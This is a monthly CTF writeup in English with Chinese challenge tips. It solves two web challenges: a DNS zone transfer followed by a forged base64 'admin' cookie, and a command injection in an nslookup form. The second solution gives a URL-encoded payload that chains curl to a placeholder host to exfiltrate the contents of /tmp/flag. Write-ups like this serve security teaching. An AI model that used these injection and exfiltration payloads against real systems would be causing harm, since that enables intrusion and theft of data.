Nov. Monthly CTF Writeup

CTF Information

• Name: Monthly CTF Nov.
• Website: http://124.16.75.162:40002
• Type: Online
• Format: Jeopardy

Web1 听说贵司有一个神秘入口

Description

tips1: 神秘端口（40001-40009)
tips2: 扫目录
tips3: 注意域名
tips4: 神秘端口提供的是有漏洞的dns服务
tips5: 听说不用域名访问的都是坏蜀黍
http://124.16.75.162:40005

Solution

According to the hints, try to scan the ports:

40001/tcp filtered unknown
40002/tcp open     unknown
40003/tcp open     unknown
40004/tcp filtered unknown
40005/tcp open     unknown
40006/tcp open     unknown
40007/tcp closed   unknown
40008/tcp closed   unknown
40009/tcp open     unknown

Focus on the filtered port: 40001 and 40003.

And then scan for the website. Find readme.txt and directory upload. And there is only a favico icon in the directory.

Look through the file readme.txt. In the file, it points that we should access the website using another way. And there is a domain bluectf.com in the inscirbe.

However, bluectf.com has not been registered. And the tips4 tells that the DNS server is running on the port.

Try to use dig to find the bluectf using the specific dns.

dig @124.16.75.162 bluectf.com -p 40003

Shows Connection timed out. So, use TCP instead of UDP.

dig @124.16.75.162 bluectf.com -p 40003 +tcp -t ANY

And got the result:

; <<>> DiG 9.8.3-P1 <<>> @124.16.75.162 bluectf.com -p 40003 +tcp -t ANY
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1610
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0


;; QUESTION SECTION:
;bluectf.com.			IN	ANY


;; ANSWER SECTION:
bluectf.com.		86400	IN	SOA	localhost. root.localhost. 1 604800 86400 2419200 86400
bluectf.com.		86400	IN	NS	bluedns.


;; Query time: 1 msec
;; SERVER: 124.16.75.162#40003(124.16.75.162)
;; WHEN: Sun Nov 20 12:05:26 2016
;; MSG SIZE  rcvd: 100

The description shows that the DNS Server is vulnerable. And the result contains SOA item. So try SOA vulnerability:

dig @124.16.75.162 axfr bluectf.com -p 40003 +tcp

Got:

; <<>> DiG 9.8.3-P1 <<>> @124.16.75.162 axfr bluectf.com -p 40003 +tcp
; (1 server found)
;; global options: +cmd
bluectf.com.		86400	IN	SOA	localhost. root.localhost. 1 604800 86400 2419200 86400
bluectf.com.		86400	IN	NS	bluedns.
bluedns.bluectf.com.	86400	IN	A	124.16.75.162
flag1.bluectf.com.	86400	IN	TXT	"see http://bluedns.bluectf.com/flag_1_flag_123456.php"
bluectf.com.		86400	IN	SOA	localhost. root.localhost. 1 604800 86400 2419200 86400
;; Query time: 1 msec
;; SERVER: 124.16.75.162#40003(124.16.75.162)
;; WHEN: Sun Nov 20 12:15:27 2016
;; XFR size: 5 records (messages 1, bytes 232)

It tells where the flag is, however, the website should be accessed by domain not IP address. So add an item in hosts file:

124.16.75.162 bluedns.bluectf.com

And access: http://bluedns.bluectf.com:40005/flag_1_flag_123456.php

Capture the request, and in the request, it carries a Cookie. The value is the base64 encoded form of string guest. Change it to the base64 encoded form of string admin.

And got the flag: bluectf{zone_transfer_in_dns}

Web2 继续搞

Description

tips1:看index.php
tips2:无回显额，怎么办

Solution

Look at the page index.php. It require the user input a host address. And it will send by GET, and returns the nslookup result.

So, it looks like commmand concat. So try to concat other commands using ;|& and so on. And & succeed.

Using cat to show the flag, but it shows nothing. So using Web Server Log to pass out the flag.

Payload:

/index.php?host=127.0.0.1%26curl%20xxx.com%2f%60cat%20%2ftmp%2fflag%60

It shows the flag:

flag: bluectf{R3m0t3_C0d3_3x3cuti0n_in_ns100kup}